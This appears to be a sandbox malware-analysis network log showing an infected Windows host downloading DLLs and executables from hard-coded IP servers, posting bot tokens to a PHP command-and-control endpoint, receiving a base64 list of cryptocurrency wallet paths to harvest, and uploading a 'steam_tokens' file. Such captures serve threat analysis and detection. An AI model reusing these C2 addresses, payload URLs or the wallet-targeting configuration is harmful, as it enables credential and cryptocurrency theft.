Jul 3, 2024 18:08:40.596178055 CEST	90	OUT	GET /69934896f997d5bb/softokn3.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 3, 2024 18:08:40.772926092 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:40 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Jul 3, 2024 18:08:40.977889061 CEST	94	OUT	GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 3, 2024 18:08:41.154886961 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Jul 3, 2024 18:08:41.791322947 CEST	197	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB Host: 85.28.47.4 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Jul 3, 2024 18:08:42.560412884 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 3, 2024 18:08:42.650165081 CEST	464	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGID Host: 85.28.47.4 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 2d 2d 0d 0a Data Ascii: ------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="message"wallets------HJJEGIEHIJKKFIDHDGID--
Jul 3, 2024 18:08:42.828495026 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:42 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Jul 3, 2024 18:08:42.831020117 CEST	462	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJ Host: 85.28.47.4 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="message"files------CAKFIJDHJEGIDHJKKKJJ--
Jul 3, 2024 18:08:43.009812117 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 3, 2024 18:08:43.028281927 CEST	560	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAE Host: 85.28.47.4 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file"------EGIDAAFIEHIEHJKFHCAE--
Jul 3, 2024 18:08:43.859468937 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 3, 2024 18:08:43.886789083 CEST	467	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHD Host: 85.28.47.4 Content-Length: 270 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 2d 2d 0d 0a Data Ascii: ------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="message"jbdtaijovg------JEHIIDGCFHIEGDGCBFHD--
Jul 3, 2024 18:08:44.764170885 CEST	331	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:43 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 104 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 63 33 4c 6a 6b 78 4c 6a 63 33 4c 6a 67 78 4c 32 31 70 62 6d 55 76 59 57 31 68 5a 47 74 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 47 68 30 64 48 41 36 4c 79 38 33 4e 79 34 35 4d 53 34 33 4e 79 34 34 4d 53 39 6a 62 33 4e 30 4c 32 64 76 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 41 3d 3d Data Ascii: aHR0cDovLzc3LjkxLjc3LjgxL21pbmUvYW1hZGthLmV4ZXwwfDB8fGh0dHA6Ly83Ny45MS43Ny44MS9jb3N0L2dvLmV4ZXwwfDB8fA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	62915	77.91.77.81	80	4368	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:08:44.791882992 CEST	77	OUT	GET /mine/amadka.exe HTTP/1.1 Host: 77.91.77.81 Cache-Control: no-cache
Jul 3, 2024 18:08:45.487421036 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:08:45 GMT Content-Type: application/octet-stream Content-Length: 1938944 Last-Modified: Wed, 03 Jul 2024 15:31:31 GMT Connection: keep-alive ETag: "66856ed3-1d9600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 c0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELafL@L@XlLL @.rsrc@.idata @ +@gxzeqrwn02~@fgoahxouLp@.taggant0L"t@
Jul 3, 2024 18:08:45.487445116 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 3, 2024 18:08:45.487453938 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 3, 2024 18:08:45.487466097 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 3, 2024 18:08:45.487477064 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 3, 2024 18:08:45.487508059 CEST	672	IN	Data Raw: 1a 60 ac 45 9d 30 cf 02 5a 6d c5 5a b2 40 bf f4 06 a4 f0 5d a2 f1 26 f9 52 e4 1b f7 26 9a dd 9a 03 a4 47 f4 8b db 7b bd 4a 95 6f e1 00 9b 8e a5 50 94 e6 cb 50 d8 b7 d1 52 f6 90 f4 c2 a4 c6 65 0e dc 1f 51 50 24 8e 3a 74 a5 af 0c 33 8d 7b 75 33 c0 Data Ascii: `E0ZmZ@]&R&G{JoPPReQP$:t3{u30E0+Q.zVD,3B;VnFP4GF>&bPtP2r0H$0%M$?nZ3H}/
Jul 3, 2024 18:08:45.487520933 CEST	1236	IN	Data Raw: cb cd f3 dd 86 15 ff ba 1a 04 3e f5 ab bf d6 f5 52 94 e3 51 50 fb 8e c5 f8 9d 06 95 76 3c be 21 23 a6 b0 c4 62 f6 bf ac 04 04 5f 85 82 94 93 91 20 bb 1b 97 c2 95 c6 b0 32 70 9f dd 32 48 dd 3a 72 96 af 3e 36 8d b3 d9 c2 d6 bf c4 9e 99 be 1a 02 24 Data Ascii: >RQPv<!#b_ 2p2H:r>6$kTiV0QPD,:_m{>3lu)Ir7;bB\|Rd2{["Z"PP2jB[/e3^-N0o>%A"}pD
Jul 3, 2024 18:08:45.487530947 CEST	1236	IN	Data Raw: b3 ee ce 58 c5 5c e2 18 10 1e 5b 76 8c c6 b3 c7 b8 04 dd da d3 35 e3 eb 43 10 66 c1 33 c9 bf 97 d0 e0 bc 14 d2 74 8f 2d 0d bb 18 1e bb 6f cd a5 1c c1 c7 7b d8 72 90 c5 68 76 1f 4d d5 b3 fb e4 6c 47 f6 ab f0 9b a9 9c ba 1c d7 56 1e 18 8f cd 6c d7 Data Ascii: X\[v5Cf3t-o{rhvMlGVlWU\S$5BP%\^acQ%32={naCB0#L9w=]H"QP3mx.hS(N2Kt0HDF>QGs7=p9Y3\.
Jul 3, 2024 18:08:45.487621069 CEST	1236	IN	Data Raw: 96 23 0d 97 21 42 26 5f 35 24 59 a1 98 14 e4 2d 11 c3 e8 d6 ed 90 2a 35 22 f4 8f af 93 31 9a ee e2 c0 f3 b3 62 8c 67 b5 ae 35 37 4f a3 8e 31 ec 3e ff 06 39 42 e4 c7 b0 67 db f4 f4 80 c0 3a d1 95 b8 a7 55 a6 c1 85 da 2a ab 1f 91 44 bd cc 3d d7 3f Data Ascii: #!B&_5$Y-5"1bg57O1>9Bg:UD=?sl\HuD3""\|r3~\C;Y;,u7(ON\|qA~dSR0@U&Zn:9='0=U?>}nXA]
Jul 3, 2024 18:08:45.487632036 CEST	1236	IN	Data Raw: c5 20 a7 e5 11 fc af 7d da 22 8f ac 02 97 ad 75 9b d1 6f 48 b1 41 73 55 59 08 1c 0f 42 7e ae 8e 19 36 d2 31 fa 2c cf 4f a9 42 9f 3e 02 0c d8 ee 52 54 5c 73 1d e4 14 e4 1b 55 b3 c8 76 fb ee 9a 91 79 93 aa c2 c1 f8 fc f9 b2 b6 fd 9a a6 9b e6 d2 a9 Data Ascii: }"uoHAsUYB~61,OB>RT\sUvy @\|T6~S3XvS(>:X_M+@,aOOQDQF#vD\|tQq:5'eOPCOy_#{OX&1 !!htJ
Jul 3, 2024 18:08:45.492685080 CEST	1236	IN	Data Raw: fd fc 55 14 4c cd b1 be 27 66 7d 96 e4 55 28 cb d0 e9 63 57 5c 30 80 c8 a3 e6 45 79 c2 d4 98 50 c9 cd b3 a1 e5 87 27 18 45 fa 5f 36 d3 5e 9b d6 98 76 5f 35 d3 04 93 c5 c2 7d b5 d6 cb 34 5c e5 9a aa fe 81 5a c1 41 9b 52 41 b2 3e 36 24 bf 50 38 e6 Data Ascii: UL'f}U(cW\0EyP'E_6^v_5}4\ZARA>6$P8sId`\|'=Hu(SFYBa/GObVs`hVZka+~xTgvPa2m1O>l!S&&=y\|f1IBV6hUkmPT<OT-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	62922	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:03.847510099 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:04.534876108 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:04.536977053 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:04.752616882 CEST	283	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 64 0d 0a 20 3c 63 3e 31 30 30 30 30 30 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 62 30 64 35 64 61 32 63 38 35 30 36 37 33 62 35 64 37 36 61 63 31 63 65 38 63 63 64 34 61 36 65 37 66 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 5d <c>1000006001+++b5937c1a99d5f9db0d5da2c850673b5d76ac1ce8ccd4a6e7f1fbd97e9c4543b31de15441#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	62923	77.91.77.81	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:04.762696981 CEST	54	OUT	GET /stealc/random.exe HTTP/1.1 Host: 77.91.77.81
